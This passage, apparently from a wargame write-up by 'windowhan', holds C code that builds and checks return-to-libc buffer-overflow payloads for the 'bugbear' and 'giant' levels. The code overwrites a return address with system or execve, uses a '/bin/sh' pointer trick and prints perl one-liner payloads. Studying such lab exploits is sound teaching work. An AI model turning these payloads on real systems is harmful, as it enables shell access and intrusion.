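/* giant's filter: the return address must be exactly execve (memcpy(&ret, &argv[1][44], 4)). */
int giant_accepts(const uint8_t *payload, uint32_t execve_addr) {
    uint32_t ret;
    memcpy(&ret, payload + RET_OFF, 4);
    return ret == execve_addr;
}

/* Model of the top of the stack: the kernel copies the exec path string right below a 4-byte
 * zero word at STACK_TOP-4 (the dump shows the path at 0xbfffffe4 and "" at 0xbffffffc).
 * Returns the address of the last 4 bytes of the name, 0 if it does not fit the model. */
struct top_of_stack { uint8_t mem[64]; uint32_t base; };

uint32_t place_execfn(struct top_of_stack *t, const char *path) {
    size_t n = strlen(path) + 1;                 /* string plus its NUL */
    uint32_t str_addr = STACK_TOP - 4 - (uint32_t)n;
    if (n + 4 > sizeof t->mem || n < 5) return 0;
    t->base = STACK_TOP - (uint32_t)sizeof t->mem;
    memset(t->mem, 0, sizeof t->mem);
    memcpy(t->mem + (str_addr - t->base), path, n);
    return str_addr + (uint32_t)n - 1 - 4;
}
static uint32_t read_top(const struct top_of_stack *t, uint32_t addr) { return get32(t->mem + (addr - t->base)); }

/* giant's trick: the binary is named with the 4 raw bytes of BINSH_ADDR, so the exec path string
 * ends with a pointer to "/bin/sh" followed by zeros. Returns the argv pointer execve must get
 * (0 if the modelled memory does not resolve to argv = {&"/bin/sh", NULL}, envp = {NULL}) and
 * stores the envp pointer. `prefix` is "./" or the directory the shell expands it to. */
uint32_t giant_stack_argv(const char *prefix, uint32_t *envp_out) {
    struct top_of_stack t;
    char name[64];
    size_t pl = strlen(prefix);
    uint32_t argv_p, envp_p;
    if (pl + 5 > sizeof name) return 0;
    memcpy(name, prefix, pl);
    put32((uint8_t *)name + pl, BINSH_ADDR);     /* 0x400fbff9 contains no zero byte */
    name[pl + 4] = '\0';
    argv_p = place_execfn(&t, name);
    if (!argv_p) return 0;
    envp_p = argv_p + 5;                         /* past the 4 bytes and the string's NUL */
    if (read_top(&t, argv_p) != BINSH_ADDR) return 0;   /* argv[0] -> "/bin/sh" */
    if (read_top(&t, argv_p + 4) != 0) return 0;        /* argv[1] == NULL */
    if (read_top(&t, envp_p) != 0) return 0;            /* envp[0] == NULL */
    if (envp_out) *envp_out = envp_p;
    return argv_p;
}

/* Worked checks on the two write-ups' payloads; each returns 1 when the description holds. */
int check_bugbear_rtl(void) {
    uint8_t p[64];
    uint32_t args[1] = { BINSH_ADDR };
    size_t n = rtl_frame(p, SYSTEM_ADDR, 0x61616161u, args, 1);   /* "aaaa" as the fake return */
    return n == 56 && bugbear_accepts(p) && get32(p + 44) == SYSTEM_ADDR && get32(p + 52) == BINSH_ADDR;
}
int check_bugbear_rejects_stack_ret(void) {
    uint8_t p[64];
    rtl_frame(p, 0xbffffd00u, 0x90909090u, NULL, 0);   /* hypothetical "return into the stack" */
    return !bugbear_accepts(p);
}
int check_giant_frame(void) {
    uint8_t p[64];
    uint32_t envp = 0, args[3];
    uint32_t argv = giant_stack_argv("./", &envp);
    size_t n;
    args[0] = BINSH_ADDR; args[1] = argv; args[2] = envp;
    n = rtl_frame(p, EXECVE_ADDR, 0x400391e0u, args, 3);   /* fake return as in the post */
    return argv != 0 && n == 64 && giant_accepts(p, EXECVE_ADDR) && bugbear_accepts(p)
        && get32(p + 56) == 0xbffffff7u && get32(p + 60) == 0xbffffffcu;
}

static void dump(const char *label, const uint8_t *p, size_t n) {   /* as a perl one-liner */
    size_t i;
    printf("%s: perl -e 'print \"", label);
    for (i = 0; i < n; i++) printf("\\x%02x", p[i]);
    printf("\"'\n");
}

int main(void) {
    uint8_t p[64];
    uint32_t envp = 0, a1[1] = { BINSH_ADDR }, a3[3];
    size_t n = rtl_frame(p, SYSTEM_ADDR, 0x61616161u, a1, 1);
    dump("bugbear", p, n);
    a3[0] = BINSH_ADDR; a3[1] = giant_stack_argv("./", &envp); a3[2] = envp;
    n = rtl_frame(p, EXECVE_ADDR, 0x400391e0u, a3, 3);
    dump("giant", p, n);
    printf("checks: %d %d %d\n", check_bugbear_rtl(), check_bugbear_rejects_stack_ret(), check_giant_frame());
    return 0;
}
```

The argv pointer comes out as 0xbffffff7 for both "./" and "/home/bugbear/tmp/" because the 4 name bytes always sit immediately before the string's NUL, which is itself fixed at 0xbffffffb by the zero word above it; the directory prefix only moves where the string starts. The 0x40 top byte of every libc address is also what lets both frames sail past bugbear's '\xbf' check.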


Posted by windowhan